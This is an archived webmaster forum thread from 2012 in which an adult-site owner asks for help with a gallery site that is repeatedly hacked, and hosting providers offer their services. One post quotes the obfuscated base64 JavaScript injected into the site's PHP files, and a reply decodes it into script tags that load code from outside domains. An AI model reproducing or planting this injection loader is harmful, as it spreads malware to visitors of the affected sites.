Hosting Companies - Contact Me

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • Pseudonymous
    Photographer/Owner
    • Apr 2006
    • 2661

    #1

    Hosting Companies - Contact Me

    I am currently hosting with somebody but one of my tgps is being hacked over and over and over and the techs don`t know how it`s being exploited I guess. Their only advice is to start over and reinstall everything on a fresh server. Well this isn`t possible. Firstly, im using a script they dont make anymore and secondly, the site is like 10 years old and the manpower of making the galleries and letting all that content run through again and then deleting the 14 out of the 15 pictures in each gal that didnt rank as high (smartthumbs ran) - It would take a solid year of working on it. Just not going to happen. The galleries are handpicked content that's not even in sponsors FHG either. Alot of it is members area stuff


    I couldnt copy over the galleries to a new server because they'd no longer be synced with arylia/smartthumbs. And i can't copy all that stuff over because i could be copying over the exploit, most likely

    So I was hoping there was somebody that I could transfer all my sites over to that WILL be able to figure out how it's being exploited and put an end to it.

    While im not sure how easy it is to do this because i dont run a server company but i figured i would atleast put it out there because im pretty much out of options.

    I just can't face that some idiot nobody hacker can't be stopped, you would think they could narrow down the issue with how it's being exploited considering it's been like 100 times now.

    Or if anybody has any tips on how to stop/search for exploits. Ive used some pretty good shell exploit tools and they've found nothing.

    My ICQ is in my profile
    Last edited by Pseudonymous; 04-20-2012, 06:56 PM.
    Previous owner of SoloRevenue
    Previous product manager @ Modelcentro.com/MCProfits.com, IsMyGirl.com, SMRevenue.com
  • Poppy
    Confirmed User
    • Apr 2002
    • 6254

    #2
    Hi there. We would love to try and help you out here at MojoHost. We are a huge supporter of the adult industry and one of the best managed hosts around.

    I tried to find info to contact you, but couldn't find anything.

    I look forward to hearing from you.
    VP Sales, Peak5Payments
    [email protected] Skype: consultpoppy
    In adult since 98'

    Comment

    • Pseudonymous
      Photographer/Owner
      • Apr 2006
      • 2661

      #3
      Did you read my post? I expected an answer like, we have really good techs, ill have one contact you or something like that. Im not sure a rep would really be able to confirm that you guys could fix it if i made the switch. ;) Also if you read my post, i mentioned my ICQ is in my profile. Its in there. I double checked
      Previous owner of SoloRevenue
      Previous product manager @ Modelcentro.com/MCProfits.com, IsMyGirl.com, SMRevenue.com

      Comment

      • AdultEUhost
        ORLY?
        • Oct 2005
        • 2579

        #4
        what is the script you are referring too that is no longer made/supported? As you mentioned a few in your post.

        I don't think any host can you give you the guarantee they will find it, it will be a best effort kind of thing. What exploit is it? redirects, iframes, malware? Is this the only domain on the server? Because if incorrectly setup (not different system users, suphp, etc) it might be the case that an other domain was infected but that they gained access to multiple domains.

        If you don't want to share the info here, drop me an email.
        ICQ: 267-443-722 / leon [at] adulteuhost [dotcom]

        Nominated for an XBIZ Award as "Webhost of the Year" in 2007, 2012, 2013 and 2014

        Comment

        • Pseudonymous
          Photographer/Owner
          • Apr 2006
          • 2661

          #5
          Well I have other domains on the server but they aren't infected.

          AutoGallerySQL is what they dont make anymore. Yeah I could purchase their newer script, export and import into that. but like i said, these are handmade galleries and it would truly take forever. it'd be basically makign the site over again and hoping it does as well. i dont want to start a website from scratch again and put in a crazy amount of man hours. I have my plate full before this, i just dont have the time. I bought the site because i dont have the time to be rebuilding each and every freaking thing from ground up

          Well im not looking for a guarantee, i'm looking to explain the exact thing theyre doing and if its something they are real sure they can stop, ill move over, if they can't, ill point my domain back to my old server company and cancel. I truly think this is something that can be stopped and ill reward a server company for putting an end to it.

          I guess malware? I mean it triggers googles safe browsing warning. I can't give you all details because no matter what i do, i can't see the issue myself. It seems mainly americans can see the ads. Its typically at the bottom of my site, and a banner. Im not sure what it is this time. Even when i use a proxy, i still can't see it though

          At the bottom of my page

          <script language="JavaScript" type="text/javascript">function decode64(input){var base64="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnop qrstuvwxyz0123456789+/=";var output="";var ch1,ch2,ch3,enc1,enc2,enc3,enc4;var i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{enc1=base64.indexOf(input.charAt(i++));en c2=base64.indexOf(input.charAt(i++));enc3=base64.i ndexOf(input.charAt(i++));enc4=base64.indexOf(inpu t.charAt(i++));ch1=(enc1<<2)|(enc2>>4);ch2=((enc2& 15)<<4)|(enc3>>2);ch3=((enc3&3)<<6)|enc4;output=ou tput+String.fromCharCode(ch1);if(enc3!=64)output=o utput+String.fromCharCode(ch2);if(enc4!=64)output= output+String.fromCharCode(ch3);ch1=ch2=ch3="";enc 1=enc2=enc3=enc4=""}while(i<input.length);return output;}document.write(decode64("PHNjcmlwdCBzcmM9I mh0dHA6Ly9wYWxhLm5ldC8ucGhwIj48L3NjcmlwdD4KPHNjcml wdCBzcmM9Imh0dHA6Ly95YWNsaXAuY29tL2luLnBocCI+PC9zY 3JpcHQ+CjxzY3JpcHQgc3JjPSJodHRwOi8vcGV5by5vcmcvLnp pcCI+PC9zY3JpcHQ+"));</script>

          I get this garbage inserted into the html. Its at the bottom of every php file right now so it seems

          The person seems to do something different everytime.

          And my other domains are my paysites, this is my one tgp on this server. So maybe they do have access to all but only choosing to screw with the tgp because their tool works with tradescripts or who knows
          Last edited by Pseudonymous; 04-20-2012, 07:27 PM.
          Previous owner of SoloRevenue
          Previous product manager @ Modelcentro.com/MCProfits.com, IsMyGirl.com, SMRevenue.com

          Comment

          • AdultEUhost
            ORLY?
            • Oct 2005
            • 2579

            #6
            If you want I can take a look at it, no strings attached.
            That will be tomorrow though as it's 5.30 am here and I am done for today
            Leave me an icq or email and I will reply when I am at the office tomorrow
            ICQ: 267-443-722 / leon [at] adulteuhost [dotcom]

            Nominated for an XBIZ Award as "Webhost of the Year" in 2007, 2012, 2013 and 2014

            Comment

            • Brad Mitchell
              Confirmed User
              • Nov 2001
              • 9813

              #7
              Originally posted by Pseudonymous
              Did you read my post? I expected an answer like, we have really good techs, ill have one contact you or something like that. Im not sure a rep would really be able to confirm that you guys could fix it if i made the switch. ;) Also if you read my post, i mentioned my ICQ is in my profile. Its in there. I double checked
              Of course we could fix you if you made the switch. Very likely, so could some of our competitors. You're not exactly blazing in unfamiliar territory, we host more than 50,000 porn sites. We have amazing techs, however, it wouldn't be at all normal for us to triage one of them without first talking to you. Most people don't populate their profile so I'm certain Paul was just reading your signature. Best of luck-

              Brad
              President at MojoHost | brad at mojohost dot com | Skype MojoHostBrad
              71 industry awards for hosting and professional excellence since 1999

              Comment

              • mightyjoe
                Confirmed User
                • Jun 2004
                • 1395

                #8
                Originally posted by Pseudonymous
                (decode64("PHNjcmlwdCBzcmM9Imh0dHA6Ly9wYWxhLm5ldC8 ucGhwIj48L3NjcmlwdD4KPHNjcmlwdCBzcmM9Imh0dHA6Ly95Y WNsaXAuY29tL2luLnBocCI+PC9zY3JpcHQ+CjxzY3JpcHQgc3J jPSJodHRwOi8vcGV5by5vcmcvLnppcCI+PC9zY3JpcHQ+")
                <script src="http://pala.net/.php"></script>
                <script src="http://yaclip.com/in.php"></script>
                <script src="http://peyo.org/.zip"></script>

                Comment

                • Pseudonymous
                  Photographer/Owner
                  • Apr 2006
                  • 2661

                  #9
                  Originally posted by AdultEUhost
                  If you want I can take a look at it, no strings attached.
                  That will be tomorrow though as it's 5.30 am here and I am done for today
                  Leave me an icq or email and I will reply when I am at the office tomorrow
                  the thing is, i think i was told by tech theyre going to restore an old backup and probably temp fix the issue again (for the 50th time)... i want to tell them to hold off so that someone can see the issue

                  but i can't have my site down like it is right now, tgps aren't exactly stable.

                  left you a message anyway
                  Previous owner of SoloRevenue
                  Previous product manager @ Modelcentro.com/MCProfits.com, IsMyGirl.com, SMRevenue.com

                  Comment

                  • Pseudonymous
                    Photographer/Owner
                    • Apr 2006
                    • 2661

                    #10
                    I added both you guys from MojoHost on Skype. Accept me when you can
                    Previous owner of SoloRevenue
                    Previous product manager @ Modelcentro.com/MCProfits.com, IsMyGirl.com, SMRevenue.com

                    Comment

                    • Adraco
                      Confirmed User
                      • May 2009
                      • 3745

                      #11
                      I have had the same happening to me and Amerinoc solved it. Very likely will Brad and his guys at Mojo be able to do the same.

                      And of course fixing it is one thing, but then one need to prevent it from happening again, so tightening up file permission, ftp passwords and what not.

                      Turn to Mojo since they were here first and are good guys. Should it, for any one reason not work out, for what it's worth I can dearly recommend Amerinoc.

                      Good luck!
                      ----------------------------------------------------------------------------------
                      The truth is not affected by the beliefs, or doubts, of the majority.

                      Comment

                      • HomerSimpson
                        Too lazy to set a custom title
                        • Sep 2005
                        • 13826

                        #12
                        get hosting with WHM/cPanel from NakedHosting
                        hire me to move and secure your sites

                        and you'll never have these types of problems..
                        Make a bank with Chaturbate - the best selling webcam program
                        Ads that can't be block with AdBlockers !!! /// Best paying popup program (Bitcoin payouts) !!!

                        PHP, MySql, Smarty, CodeIgniter, Laravel, WordPress, NATS... fixing stuff, server migrations & optimizations... My ICQ: 27429884 | Email:

                        Comment

                        • raymor
                          Confirmed User
                          • Oct 2002
                          • 3745

                          #13
                          You said you don't see it. Search for your sure in Google and click do the referrer is set to Google. If you see it then, that tells us something important. Contract me for deails if you get the exploit when coming from Google.

                          Well I have other domains on the server but they aren't infected
                          So the problem isn't the server, it's the script. Though tightening up some security related settings in PHP may make the hole in the script harder to exploit. You may be better off consulting a security company rather than a web hosting company.
                          For historical display only. This information is not current:
                          support&#64;bettercgi.com ICQ 7208627
                          Strongbox - The next generation in site security
                          Throttlebox - The next generation in bandwidth control
                          Clonebox - Backup and disaster recovery on steroids

                          Comment

                          Working...